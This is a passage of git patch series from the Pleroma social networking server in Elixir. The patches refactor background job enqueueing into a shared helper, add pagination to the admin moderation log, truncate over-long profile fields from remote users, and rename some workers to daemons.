def delete_user_activities(%User{ap_id: ap_id} = user) do
diff --git a/lib/pleroma/web/activity_pub/activity_pub.ex b/lib/pleroma/web/activity_pub/activity_pub.ex
index 74c5eb91c..90b409606 100644
--- a/lib/pleroma/web/activity_pub/activity_pub.ex
+++ b/lib/pleroma/web/activity_pub/activity_pub.ex
@@ -26,8 +26,6 @@ defmodule Pleroma.Web.ActivityPub.ActivityPub do
require Logger
require Pleroma.Constants
- import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
-
# For Announce activities, we filter the recipients based on following status for any actors
# that match actual users. See issue #164 for more information about why this is necessary.
defp get_recipients(%{"type" => "Announce"} = data) do
@@ -148,9 +146,7 @@ def insert(map, local \\ true, fake \\ false, bypass_actor_check \\ false) when
activity
end
- %{"op" => "fetch_data_for_activity", "activity_id" => activity.id}
- |> BackgroundWorker.new(worker_args(:background))
- |> Repo.insert()
+ BackgroundWorker.enqueue("fetch_data_for_activity", %{"activity_id" => activity.id})
Notification.create_notifications(activity)
diff --git a/lib/pleroma/web/activity_pub/mrf/mediaproxy_warming_policy.ex b/lib/pleroma/web/activity_pub/mrf/mediaproxy_warming_policy.ex
index 178321558..26b8539fe 100644
--- a/lib/pleroma/web/activity_pub/mrf/mediaproxy_warming_policy.ex
+++ b/lib/pleroma/web/activity_pub/mrf/mediaproxy_warming_policy.ex
@@ -7,7 +7,6 @@ defmodule Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicy do
@behaviour Pleroma.Web.ActivityPub.MRF
alias Pleroma.HTTP
- alias Pleroma.Repo
alias Pleroma.Web.MediaProxy
alias Pleroma.Workers.BackgroundWorker
@@ -18,8 +17,6 @@ defmodule Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicy do
recv_timeout: 10_000
]
- import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
-
def perform(:prefetch, url) do
Logger.info("Prefetching #{inspect(url)}")
@@ -34,9 +31,7 @@ def perform(:preload, %{"object" => %{"attachment" => attachments}} = _message)
url
|> Enum.each(fn
%{"href" => href} ->
- %{"op" => "media_proxy_prefetch", "url" => href}
- |> BackgroundWorker.new(worker_args(:background))
- |> Repo.insert()
+ BackgroundWorker.enqueue("media_proxy_prefetch", %{"url" => href})
x ->
Logger.debug("Unhandled attachment URL object #{inspect(x)}")
@@ -52,9 +47,7 @@ def filter(
%{"type" => "Create", "object" => %{"attachment" => attachments} = _object} = message
)
when is_list(attachments) and length(attachments) > 0 do
- %{"op" => "media_proxy_preload", "message" => message}
- |> BackgroundWorker.new(worker_args(:background))
- |> Repo.insert()
+ BackgroundWorker.enqueue("media_proxy_preload", %{"message" => message})
{:ok, message}
end
diff --git a/lib/pleroma/web/activity_pub/transmogrifier.ex b/lib/pleroma/web/activity_pub/transmogrifier.ex
index 9437f9a16..f27455e8b 100644
--- a/lib/pleroma/web/activity_pub/transmogrifier.ex
+++ b/lib/pleroma/web/activity_pub/transmogrifier.ex
@@ -22,8 +22,6 @@ defmodule Pleroma.Web.ActivityPub.Transmogrifier do
require Logger
require Pleroma.Constants
- import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
-
@doc """
Modifies an incoming AP object (mastodon format) to our internal format.
"""
@@ -1054,9 +1052,7 @@ def upgrade_user_from_ap_id(ap_id) do
already_ap <- User.ap_enabled?(user),
{:ok, user} <- user |> User.upgrade_changeset(data) |> User.update_and_set_cache() do
unless already_ap do
- %{"op" => "user_upgrade", "user_id" => user.id}
- |> TransmogrifierWorker.new(worker_args(:transmogrifier))
- |> Repo.insert()
+ TransmogrifierWorker.enqueue("user_upgrade", %{"user_id" => user.id})
end
{:ok, user}
diff --git a/lib/pleroma/web/federator/federator.ex b/lib/pleroma/web/federator/federator.ex
index 8f43066e3..1a2da014a 100644
--- a/lib/pleroma/web/federator/federator.ex
+++ b/lib/pleroma/web/federator/federator.ex
@@ -18,8 +18,6 @@ defmodule Pleroma.Web.Federator do
require Logger
- import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
-
def init do
# To do: consider removing this call in favor of scheduled execution (`quantum`-based)
refresh_subscriptions(schedule_in: 60)
@@ -40,15 +38,11 @@ def allowed_incoming_reply_depth?(depth) do
# Client API
def incoming_doc(doc) do
- %{"op" => "incoming_doc", "body" => doc}
- |> ReceiverWorker.new(worker_args(:federator_incoming))
- |> Pleroma.Repo.insert()
+ ReceiverWorker.enqueue("incoming_doc", %{"body" => doc})
end
def incoming_ap_doc(params) do
- %{"op" => "incoming_ap_doc", "params" => params}
- |> ReceiverWorker.new(worker_args(:federator_incoming))
- |> Pleroma.Repo.insert()
+ ReceiverWorker.enqueue("incoming_ap_doc", %{"params" => params})
end
def publish(%{id: "pleroma:fakeid"} = activity) do
@@ -56,27 +50,19 @@ def publish(%{id: "pleroma:fakeid"} = activity) do
end
def publish(activity) do
- %{"op" => "publish", "activity_id" => activity.id}
- |> PublisherWorker.new(worker_args(:federator_outgoing))
- |> Pleroma.Repo.insert()
+ PublisherWorker.enqueue("publish", %{"activity_id" => activity.id})
end
def verify_websub(websub) do
- %{"op" => "verify_websub", "websub_id" => websub.id}
- |> SubscriberWorker.new(worker_args(:federator_outgoing))
- |> Pleroma.Repo.insert()
+ SubscriberWorker.enqueue("verify_websub", %{"websub_id" => websub.id})
end
def request_subscription(websub) do
- %{"op" => "request_subscription", "websub_id" => websub.id}
- |> SubscriberWorker.new(worker_args(:federator_outgoing))
- |> Pleroma.Repo.insert()
+ SubscriberWorker.enqueue("request_subscription", %{"websub_id" => websub.id})
end
def refresh_subscriptions(worker_args \\ []) do
- %{"op" => "refresh_subscriptions"}
- |> SubscriberWorker.new(worker_args ++ [max_attempts: 1] ++ worker_args(:federator_outgoing))
- |> Pleroma.Repo.insert()
+ SubscriberWorker.enqueue("refresh_subscriptions", %{}, worker_args ++ [max_attempts: 1])
end
# Job Worker Callbacks
diff --git a/lib/pleroma/web/federator/publisher.ex b/lib/pleroma/web/federator/publisher.ex
index 42be109ab..937064638 100644
--- a/lib/pleroma/web/federator/publisher.ex
+++ b/lib/pleroma/web/federator/publisher.ex
@@ -31,11 +31,10 @@ defmodule Pleroma.Web.Federator.Publisher do
"""
@spec enqueue_one(module(), Map.t()) :: :ok
def enqueue_one(module, %{} = params) do
- worker_args = Pleroma.Workers.WorkerHelper.worker_args(:federator_outgoing)
-
- %{"op" => "publish_one", "module" => to_string(module), "params" => params}
- |> PublisherWorker.new(worker_args)
- |> Pleroma.Repo.insert()
+ PublisherWorker.enqueue(
+ "publish_one",
+ %{"module" => to_string(module), "params" => params}
+ )
end
@doc """
diff --git a/lib/pleroma/web/oauth/token/clean_worker.ex b/lib/pleroma/web/oauth/token/clean_worker.ex
index b150a68a7..eb94bf86f 100644
--- a/lib/pleroma/web/oauth/token/clean_worker.ex
+++ b/lib/pleroma/web/oauth/token/clean_worker.ex
@@ -16,12 +16,9 @@ defmodule Pleroma.Web.OAuth.Token.CleanWorker do
@one_day
)
- alias Pleroma.Repo
alias Pleroma.Web.OAuth.Token
alias Pleroma.Workers.BackgroundWorker
- import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
-
def start_link(_), do: GenServer.start_link(__MODULE__, %{})
def init(_) do
@@ -31,9 +28,7 @@ def init(_) do
@doc false
def handle_info(:perform, state) do
- %{"op" => "clean_expired_tokens"}
- |> BackgroundWorker.new(worker_args(:background))
- |> Repo.insert()
+ BackgroundWorker.enqueue("clean_expired_tokens", %{})
Process.send_after(self(), :perform, @interval)
{:noreply, state}
diff --git a/lib/pleroma/web/push/push.ex b/lib/pleroma/web/push/push.ex
index 4973b529c..7ef1532ac 100644
--- a/lib/pleroma/web/push/push.ex
+++ b/lib/pleroma/web/push/push.ex
@@ -3,13 +3,10 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Web.Push do
- alias Pleroma.Repo
alias Pleroma.Workers.WebPusherWorker
require Logger
- import Pleroma.Workers.WorkerHelper, only: [worker_args: 1]
-
def init do
unless enabled() do
Logger.warn("""
@@ -35,8 +32,6 @@ def enabled do
end
def send(notification) do
- %{"op" => "web_push", "notification_id" => notification.id}
- |> WebPusherWorker.new(worker_args(:web_push))
- |> Repo.insert()
+ WebPusherWorker.enqueue("web_push", %{"notification_id" => notification.id})
end
end
diff --git a/lib/pleroma/workers/activity_expiration_worker.ex b/lib/pleroma/workers/activity_expiration_worker.ex
index 0b491eabb..60dd3feba 100644
--- a/lib/pleroma/workers/activity_expiration_worker.ex
+++ b/lib/pleroma/workers/activity_expiration_worker.ex
@@ -8,6 +8,8 @@ defmodule Pleroma.Workers.ActivityExpirationWorker do
queue: "activity_expiration",
max_attempts: 1
+ use Pleroma.Workers.WorkerHelper, queue: "activity_expiration"
+
@impl Oban.Worker
def perform(
%{
diff --git a/lib/pleroma/workers/background_worker.ex b/lib/pleroma/workers/background_worker.ex
index 7b5575a5f..b9aef3a92 100644
--- a/lib/pleroma/workers/background_worker.ex
+++ b/lib/pleroma/workers/background_worker.ex
@@ -13,6 +13,8 @@ defmodule Pleroma.Workers.BackgroundWorker do
queue: "background",
max_attempts: 1
+ use Pleroma.Workers.WorkerHelper, queue: "background"
+
@impl Oban.Worker
def perform(%{"op" => "fetch_initial_posts", "user_id" => user_id}, _job) do
user = User.get_cached_by_id(user_id)
diff --git a/lib/pleroma/workers/digest_emails_worker.ex b/lib/pleroma/workers/digest_emails_worker.ex
new file mode 100644
index 000000000..ca073ce67
--- /dev/null
+++ b/lib/pleroma/workers/digest_emails_worker.ex
@@ -0,0 +1,21 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Workers.DigestEmailsWorker do
+ alias Pleroma.User
+
+ # Note: `max_attempts` is intended to be overridden in `new/2` call
+ use Oban.Worker,
+ queue: "digest_emails",
+ max_attempts: 1
+
+ use Pleroma.Workers.WorkerHelper, queue: "digest_emails"
+
+ @impl Oban.Worker
+ def perform(%{"op" => "digest_email", "user_id" => user_id}, _job) do
+ user_id
+ |> User.get_cached_by_id()
+ |> Pleroma.DigestEmailWorker.perform()
+ end
+end
diff --git a/lib/pleroma/workers/mailer_worker.ex b/lib/pleroma/workers/mailer_worker.ex
index 4f73d61bc..a4bd54a6c 100644
--- a/lib/pleroma/workers/mailer_worker.ex
+++ b/lib/pleroma/workers/mailer_worker.ex
@@ -3,13 +3,13 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Workers.MailerWorker do
- alias Pleroma.User
-
# Note: `max_attempts` is intended to be overridden in `new/2` call
use Oban.Worker,
queue: "mailer",
max_attempts: 1
+ use Pleroma.Workers.WorkerHelper, queue: "mailer"
+
@impl Oban.Worker
def perform(%{"op" => "email", "encoded_email" => encoded_email, "config" => config}, _job) do
encoded_email
@@ -17,10 +17,4 @@ def perform(%{"op" => "email", "encoded_email" => encoded_email, "config" => con
|> :erlang.binary_to_term()
|> Pleroma.Emails.Mailer.deliver(config)
end
-
- def perform(%{"op" => "digest_email", "user_id" => user_id}, _job) do
- user_id
- |> User.get_cached_by_id()
- |> Pleroma.DigestEmailWorker.perform()
- end
end
diff --git a/lib/pleroma/workers/publisher_worker.ex b/lib/pleroma/workers/publisher_worker.ex
index 5671d2a29..a3ac22635 100644
--- a/lib/pleroma/workers/publisher_worker.ex
+++ b/lib/pleroma/workers/publisher_worker.ex
@@ -11,6 +11,8 @@ defmodule Pleroma.Workers.PublisherWorker do
queue: "federator_outgoing",
max_attempts: 1
+ use Pleroma.Workers.WorkerHelper, queue: "federator_outgoing"
+
def backoff(attempt) when is_integer(attempt) do
Pleroma.Workers.WorkerHelper.sidekiq_backoff(attempt, 5)
end
diff --git a/lib/pleroma/workers/receiver_worker.ex b/lib/pleroma/workers/receiver_worker.ex
index cdce630f2..3cc415ce4 100644
--- a/lib/pleroma/workers/receiver_worker.ex
+++ b/lib/pleroma/workers/receiver_worker.ex
@@ -10,6 +10,8 @@ defmodule Pleroma.Workers.ReceiverWorker do
queue: "federator_incoming",
max_attempts: 1
+ use Pleroma.Workers.WorkerHelper, queue: "federator_incoming"
+
@impl Oban.Worker
def perform(%{"op" => "incoming_doc", "body" => doc}, _job) do
Federator.perform(:incoming_doc, doc)
diff --git a/lib/pleroma/workers/scheduled_activity_worker.ex b/lib/pleroma/workers/scheduled_activity_worker.ex
index 4094411ae..936bb64d3 100644
--- a/lib/pleroma/workers/scheduled_activity_worker.ex
+++ b/lib/pleroma/workers/scheduled_activity_worker.ex
@@ -8,6 +8,8 @@ defmodule Pleroma.Workers.ScheduledActivityWorker do
queue: "scheduled_activities",
max_attempts: 1
+ use Pleroma.Workers.WorkerHelper, queue: "scheduled_activities"
+
@impl Oban.Worker
def perform(%{"op" => "execute", "activity_id" => activity_id}, _job) do
Pleroma.ScheduledActivityWorker.perform(:execute, activity_id)
diff --git a/lib/pleroma/workers/subscriber_worker.ex b/lib/pleroma/workers/subscriber_worker.ex
index 22d1dc956..4fb994554 100644
--- a/lib/pleroma/workers/subscriber_worker.ex
+++ b/lib/pleroma/workers/subscriber_worker.ex
@@ -12,6 +12,8 @@ defmodule Pleroma.Workers.SubscriberWorker do
queue: "federator_outgoing",
max_attempts: 1
+ use Pleroma.Workers.WorkerHelper, queue: "federator_outgoing"
+
@impl Oban.Worker
def perform(%{"op" => "refresh_subscriptions"}, _job) do
Federator.perform(:refresh_subscriptions)
diff --git a/lib/pleroma/workers/transmogrifier_worker.ex b/lib/pleroma/workers/transmogrifier_worker.ex
index 6f5c1a2f2..6fecc2bf9 100644
--- a/lib/pleroma/workers/transmogrifier_worker.ex
+++ b/lib/pleroma/workers/transmogrifier_worker.ex
@@ -10,6 +10,8 @@ defmodule Pleroma.Workers.TransmogrifierWorker do
queue: "transmogrifier",
max_attempts: 1
+ use Pleroma.Workers.WorkerHelper, queue: "transmogrifier"
+
@impl Oban.Worker
def perform(%{"op" => "user_upgrade", "user_id" => user_id}, _job) do
user = User.get_cached_by_id(user_id)
diff --git a/lib/pleroma/workers/web_pusher_worker.ex b/lib/pleroma/workers/web_pusher_worker.ex
index 2b1d3b99a..4c2591a5c 100644
--- a/lib/pleroma/workers/web_pusher_worker.ex
+++ b/lib/pleroma/workers/web_pusher_worker.ex
@@ -11,6 +11,8 @@ defmodule Pleroma.Workers.WebPusherWorker do
queue: "web_push",
max_attempts: 1
+ use Pleroma.Workers.WorkerHelper, queue: "web_push"
+
@impl Oban.Worker
def perform(%{"op" => "web_push", "notification_id" => notification_id}, _job) do
notification = Repo.get(Notification, notification_id)
diff --git a/lib/pleroma/workers/worker_helper.ex b/lib/pleroma/workers/worker_helper.ex
index f9ed2e64d..b12f198d4 100644
--- a/lib/pleroma/workers/worker_helper.ex
+++ b/lib/pleroma/workers/worker_helper.ex
@@ -4,6 +4,7 @@
defmodule Pleroma.Workers.WorkerHelper do
alias Pleroma.Config
+ alias Pleroma.Workers.WorkerHelper
def worker_args(queue) do
case Config.get([:workers, :retries, queue]) do
@@ -20,4 +21,21 @@ def sidekiq_backoff(attempt, pow \\ 4, base_backoff \\ 15) do
trunc(backoff)
end
+
+ defmacro __using__(opts) do
+ caller_module = __CALLER__.module
+ queue = Keyword.fetch!(opts, :queue)
+
+ quote do
+ def enqueue(op, params, worker_args \\ []) do
+ params = Map.merge(%{"op" => op}, params)
+ queue_atom = String.to_atom(unquote(queue))
+ worker_args = worker_args ++ WorkerHelper.worker_args(queue_atom)
+
+ unquote(caller_module)
+ |> apply(:new, [params, worker_args])
+ |> Pleroma.Repo.insert()
+ end
+ end
+ end
end
From 9c96b17e16a4911d3e20149e1b54b12baaf71617 Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Sun, 1 Sep 2019 21:23:30 +0300
Subject: [PATCH 024/272] Add pagination to logs
---
lib/pleroma/moderation_log.ex | 29 +++++++++++++------
.../admin_api/views/moderation_log_view.ex | 5 +++-
2 files changed, 24 insertions(+), 10 deletions(-)
diff --git a/lib/pleroma/moderation_log.ex b/lib/pleroma/moderation_log.ex
index 89a5e13c3..352cad433 100644
--- a/lib/pleroma/moderation_log.ex
+++ b/lib/pleroma/moderation_log.ex
@@ -15,12 +15,18 @@ defmodule Pleroma.ModerationLog do
end
def get_all(params) do
- params
- |> get_all_query()
- |> maybe_filter_by_date(params)
- |> maybe_filter_by_user(params)
- |> maybe_filter_by_search(params)
- |> Repo.all()
+ base_query =
+ get_all_query()
+ |> maybe_filter_by_date(params)
+ |> maybe_filter_by_user(params)
+ |> maybe_filter_by_search(params)
+
+ query_with_pagination = base_query |> paginate_query(params)
+
+ %{
+ items: Repo.all(query_with_pagination),
+ count: Repo.aggregate(base_query, :count, :id)
+ }
end
defp maybe_filter_by_date(query, %{start_date: nil, end_date: nil}), do: query
@@ -61,14 +67,19 @@ defp maybe_filter_by_search(query, %{search: search}) do
)
end
- defp get_all_query(%{page: page, page_size: page_size}) do
- from(q in __MODULE__,
- order_by: [desc: q.inserted_at],
+ defp paginate_query(query, %{page: page, page_size: page_size}) do
+ from(q in query,
limit: ^page_size,
offset: ^((page - 1) * page_size)
)
end
+ defp get_all_query do
+ from(q in __MODULE__,
+ order_by: [desc: q.inserted_at]
+ )
+ end
+
defp parse_datetime(datetime) do
{:ok, parsed_datetime, _} = DateTime.from_iso8601(datetime)
diff --git a/lib/pleroma/web/admin_api/views/moderation_log_view.ex b/lib/pleroma/web/admin_api/views/moderation_log_view.ex
index b3fc7cfe5..e7752d1f3 100644
--- a/lib/pleroma/web/admin_api/views/moderation_log_view.ex
+++ b/lib/pleroma/web/admin_api/views/moderation_log_view.ex
@@ -8,7 +8,10 @@ defmodule Pleroma.Web.AdminAPI.ModerationLogView do
alias Pleroma.ModerationLog
def render("index.json", %{log: log}) do
- render_many(log, __MODULE__, "show.json", as: :log_entry)
+ %{
+ items: render_many(log.items, __MODULE__, "show.json", as: :log_entry),
+ total: log.count
+ }
end
def render("show.json", %{log_entry: log_entry}) do
From c5ffbfb8d547199f2345e28f085dd12e8b443f21 Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Sun, 1 Sep 2019 21:25:55 +0300
Subject: [PATCH 025/272] Changelog entry
---
CHANGELOG.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 2fdcb014a..0d44944eb 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -95,6 +95,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
- Mix Tasks: `mix pleroma.database fix_likes_collections`
- Federation: Remove `likes` from objects.
- Admin API: Added moderation log
+- Admin API: Added moderation log filters (user/start date/end date/search/pagination)
### Changed
- Configuration: Filter.AnonymizeFilename added ability to retain file extension with custom text
From 6c2fd1b78bbbb4486a5dddeffa053199ba8cc015 Mon Sep 17 00:00:00 2001
From: Maxim Filippov
Date: Sun, 1 Sep 2019 21:38:15 +0300
Subject: [PATCH 026/272] Fix tests
---
.../admin_api/admin_api_controller_test.exs | 26 ++++++++++---------
1 file changed, 14 insertions(+), 12 deletions(-)
diff --git a/test/web/admin_api/admin_api_controller_test.exs b/test/web/admin_api/admin_api_controller_test.exs
index eaf847b25..b87fffc34 100644
--- a/test/web/admin_api/admin_api_controller_test.exs
+++ b/test/web/admin_api/admin_api_controller_test.exs
@@ -2286,9 +2286,9 @@ test "returns the log", %{conn: conn, admin: admin} do
conn = get(conn, "/api/pleroma/admin/moderation_log")
response = json_response(conn, 200)
- [first_entry, second_entry] = response
+ [first_entry, second_entry] = response["items"]
- assert response |> length() == 2
+ assert response["total"] == 2
assert first_entry["data"]["action"] == "relay_unfollow"
assert first_entry["message"] ==
@@ -2330,9 +2330,10 @@ test "returns the log with pagination", %{conn: conn, admin: admin} do
conn1 = get(conn, "/api/pleroma/admin/moderation_log?page_size=1&page=1")
response1 = json_response(conn1, 200)
- [first_entry] = response1
+ [first_entry] = response1["items"]
- assert response1 |> length() == 1
+ assert response1["total"] == 2
+ assert response1["items"] |> length() == 1
assert first_entry["data"]["action"] == "relay_unfollow"
assert first_entry["message"] ==
@@ -2341,9 +2342,10 @@ test "returns the log with pagination", %{conn: conn, admin: admin} do
conn2 = get(conn, "/api/pleroma/admin/moderation_log?page_size=1&page=2")
response2 = json_response(conn2, 200)
- [second_entry] = response2
+ [second_entry] = response2["items"]
- assert response2 |> length() == 1
+ assert response2["total"] == 2
+ assert response2["items"] |> length() == 1
assert second_entry["data"]["action"] == "relay_follow"
assert second_entry["message"] ==
@@ -2387,9 +2389,9 @@ test "filters log by date", %{conn: conn, admin: admin} do
)
response1 = json_response(conn1, 200)
- [first_entry] = response1
+ [first_entry] = response1["items"]
- assert response1 |> length() == 1
+ assert response1["total"] == 1
assert first_entry["data"]["action"] == "relay_unfollow"
assert first_entry["message"] ==
@@ -2424,9 +2426,9 @@ test "returns log filtered by user", %{conn: conn, admin: admin, moderator: mode
conn1 = get(conn, "/api/pleroma/admin/moderation_log?user_id=#{moderator.id}")
response1 = json_response(conn1, 200)
- [first_entry] = response1
+ [first_entry] = response1["items"]
- assert response1 |> length() == 1
+ assert response1["total"] == 1
assert get_in(first_entry, ["data", "actor", "id"]) == moderator.id
end
@@ -2446,9 +2448,9 @@ test "returns log filtered by search", %{conn: conn, moderator: moderator} do
conn1 = get(conn, "/api/pleroma/admin/moderation_log?search=unfo")
response1 = json_response(conn1, 200)
- [first_entry] = response1
+ [first_entry] = response1["items"]
- assert response1 |> length() == 1
+ assert response1["total"] == 1
assert get_in(first_entry, ["data", "message"]) ==
"@#{moderator.nickname} unfollowed relay: https://example.org/relay"
From 35ef470d000c53e21c6f867d53ca3a83260d93b8 Mon Sep 17 00:00:00 2001
From: Sadposter
Date: Mon, 2 Sep 2019 12:15:21 +0100
Subject: [PATCH 027/272] truncate fields for remote users instead
---
lib/pleroma/user/info.ex | 7 +++++++
test/user_test.exs | 17 +++++++++++++----
2 files changed, 20 insertions(+), 4 deletions(-)
diff --git a/lib/pleroma/user/info.ex b/lib/pleroma/user/info.ex
index 779bfbc18..0beb2f721 100644
--- a/lib/pleroma/user/info.ex
+++ b/lib/pleroma/user/info.ex
@@ -242,6 +242,7 @@ def set_keys(info, keys) do
end
def remote_user_creation(info, params) do
+ params = Map.put(params, "fields", Enum.map(params["fields"], &truncate_field/1))
info
|> cast(params, [
:ap_enabled,
@@ -326,6 +327,12 @@ defp valid_field?(%{"name" => name, "value" => value}) do
defp valid_field?(_), do: false
+ defp truncate_field(%{"name" => name, "value" => value}) do
+ {name, _chopped} = String.split_at(name, Pleroma.Config.get([:instance, :account_field_name_length], 255))
+ {value, _chopped} = String.split_at(value, Pleroma.Config.get([:instance, :account_field_value_length], 255))
+ %{"name" => name, "value" => value}
+ end
+
@spec confirmation_changeset(Info.t(), keyword()) :: Changeset.t()
def confirmation_changeset(info, opts) do
need_confirmation? = Keyword.get(opts, :need_confirmation)
diff --git a/test/user_test.exs b/test/user_test.exs
index 2cbc1f525..68a469fe3 100644
--- a/test/user_test.exs
+++ b/test/user_test.exs
@@ -1117,11 +1117,20 @@ test "get_public_key_for_ap_id fetches a user that's not in the db" do
assert {:ok, _key} = User.get_public_key_for_ap_id("http://mastodon.example.org/users/admin")
end
- test "insert or update a user from given data" do
- user = insert(:user, %{nickname: "nick@name.de"})
- data = %{ap_id: user.ap_id <> "xxx", name: user.name, nickname: user.nickname}
+ describe "insert or update a user from given data" do
+ test "with normal data" do
+ user = insert(:user, %{nickname: "nick@name.de"})
+ data = %{ap_id: user.ap_id <> "xxx", name: user.name, nickname: user.nickname}
- assert {:ok, %User{}} = User.insert_or_update_user(data)
+ assert {:ok, %User{}} = User.insert_or_update_user(data)
+ end
+
+ test "with overly long fields" do
+ current_max_length = Pleroma.Config.get([:instance, :account_field_value_length], 255)
+ user = insert(:user, nickname: "nickname@supergood.domain")
+ data = %{ap_id: user.ap_id, info: %{ fields: [%{"name" => "myfield", "value" => String.duplicate("h", current_max_length + 1)}] }}
+ assert {:ok, %User{}} = User.insert_or_update_user(data)
+ end
end
describe "per-user rich-text filtering" do
From 05c935c3961e4c1a20c7713611920318d45d4b57 Mon Sep 17 00:00:00 2001
From: Sadposter
Date: Mon, 2 Sep 2019 12:15:40 +0100
Subject: [PATCH 028/272] mix format
---
lib/pleroma/user/info.ex | 9 +++++++--
test/user_test.exs | 23 ++++++++++++++++-------
2 files changed, 23 insertions(+), 9 deletions(-)
diff --git a/lib/pleroma/user/info.ex b/lib/pleroma/user/info.ex
index 0beb2f721..ca1282d02 100644
--- a/lib/pleroma/user/info.ex
+++ b/lib/pleroma/user/info.ex
@@ -243,6 +243,7 @@ def set_keys(info, keys) do
def remote_user_creation(info, params) do
params = Map.put(params, "fields", Enum.map(params["fields"], &truncate_field/1))
+
info
|> cast(params, [
:ap_enabled,
@@ -328,8 +329,12 @@ defp valid_field?(%{"name" => name, "value" => value}) do
defp valid_field?(_), do: false
defp truncate_field(%{"name" => name, "value" => value}) do
- {name, _chopped} = String.split_at(name, Pleroma.Config.get([:instance, :account_field_name_length], 255))
- {value, _chopped} = String.split_at(value, Pleroma.Config.get([:instance, :account_field_value_length], 255))
+ {name, _chopped} =
+ String.split_at(name, Pleroma.Config.get([:instance, :account_field_name_length], 255))
+
+ {value, _chopped} =
+ String.split_at(value, Pleroma.Config.get([:instance, :account_field_value_length], 255))
+
%{"name" => name, "value" => value}
end
diff --git a/test/user_test.exs b/test/user_test.exs
index 68a469fe3..0ca310331 100644
--- a/test/user_test.exs
+++ b/test/user_test.exs
@@ -1119,17 +1119,26 @@ test "get_public_key_for_ap_id fetches a user that's not in the db" do
describe "insert or update a user from given data" do
test "with normal data" do
- user = insert(:user, %{nickname: "nick@name.de"})
- data = %{ap_id: user.ap_id <> "xxx", name: user.name, nickname: user.nickname}
+ user = insert(:user, %{nickname: "nick@name.de"})
+ data = %{ap_id: user.ap_id <> "xxx", name: user.name, nickname: user.nickname}
- assert {:ok, %User{}} = User.insert_or_update_user(data)
+ assert {:ok, %User{}} = User.insert_or_update_user(data)
end
test "with overly long fields" do
- current_max_length = Pleroma.Config.get([:instance, :account_field_value_length], 255)
- user = insert(:user, nickname: "nickname@supergood.domain")
- data = %{ap_id: user.ap_id, info: %{ fields: [%{"name" => "myfield", "value" => String.duplicate("h", current_max_length + 1)}] }}
- assert {:ok, %User{}} = User.insert_or_update_user(data)
+ current_max_length = Pleroma.Config.get([:instance, :account_field_value_length], 255)
+ user = insert(:user, nickname: "nickname@supergood.domain")
+
+ data = %{
+ ap_id: user.ap_id,
+ info: %{
+ fields: [
+ %{"name" => "myfield", "value" => String.duplicate("h", current_max_length + 1)}
+ ]
+ }
+ }
+
+ assert {:ok, %User{}} = User.insert_or_update_user(data)
end
end
From d0f07e55d28d25684130cb1090d0bdbb48807548 Mon Sep 17 00:00:00 2001
From: Sadposter
Date: Mon, 2 Sep 2019 12:31:23 +0100
Subject: [PATCH 029/272] use atom key for fields
---
lib/pleroma/user/info.ex | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/lib/pleroma/user/info.ex b/lib/pleroma/user/info.ex
index ca1282d02..151e025de 100644
--- a/lib/pleroma/user/info.ex
+++ b/lib/pleroma/user/info.ex
@@ -242,7 +242,12 @@ def set_keys(info, keys) do
end
def remote_user_creation(info, params) do
- params = Map.put(params, "fields", Enum.map(params["fields"], &truncate_field/1))
+ params =
+ if Map.has_key?(params, :fields) do
+ Map.put(params, :fields, Enum.map(params[:fields], &truncate_field/1))
+ else
+ params
+ end
info
|> cast(params, [
From e73685834c1797404c943f66417ffa30add87e04 Mon Sep 17 00:00:00 2001
From: Sadposter
Date: Mon, 2 Sep 2019 12:35:55 +0100
Subject: [PATCH 030/272] add mandatory fields for user update
---
test/user_test.exs | 2 ++
1 file changed, 2 insertions(+)
diff --git a/test/user_test.exs b/test/user_test.exs
index 0ca310331..92a48f630 100644
--- a/test/user_test.exs
+++ b/test/user_test.exs
@@ -1131,6 +1131,8 @@ test "with overly long fields" do
data = %{
ap_id: user.ap_id,
+ name: user.name,
+ nickname: user.nickname,
info: %{
fields: [
%{"name" => "myfield", "value" => String.duplicate("h", current_max_length + 1)}
From b49085c156a6a4449c95c2c315f6250317122735 Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Mon, 2 Sep 2019 14:57:40 +0300
Subject: [PATCH 031/272] [#1149] Refactoring: GenServer workers renamed to
daemons, `use Oban.Worker` moved to helper.
---
config/config.exs | 2 +-
lib/pleroma/application.ex | 4 ++--
.../activity_expiration_daemon.ex} | 2 +-
.../digest_email_daemon.ex} | 2 +-
.../scheduled_activity_daemon.ex} | 2 +-
lib/pleroma/workers/activity_expiration_worker.ex | 7 +------
lib/pleroma/workers/background_worker.ex | 5 -----
lib/pleroma/workers/digest_emails_worker.ex | 7 +------
lib/pleroma/workers/mailer_worker.ex | 5 -----
lib/pleroma/workers/publisher_worker.ex | 5 -----
lib/pleroma/workers/receiver_worker.ex | 5 -----
lib/pleroma/workers/scheduled_activity_worker.ex | 7 +------
lib/pleroma/workers/subscriber_worker.ex | 5 -----
lib/pleroma/workers/transmogrifier_worker.ex | 5 -----
lib/pleroma/workers/web_pusher_worker.ex | 5 -----
lib/pleroma/workers/worker_helper.ex | 5 +++++
.../activity_expiration_daemon_test.exs} | 2 +-
.../digest_email_daemon_test.exs} | 6 +++---
.../scheduled_activity_daemon_test.exs} | 4 ++--
19 files changed, 20 insertions(+), 65 deletions(-)
rename lib/pleroma/{activity_expiration_worker.ex => daemons/activity_expiration_daemon.ex} (96%)
rename lib/pleroma/{digest_email_worker.ex => daemons/digest_email_daemon.ex} (96%)
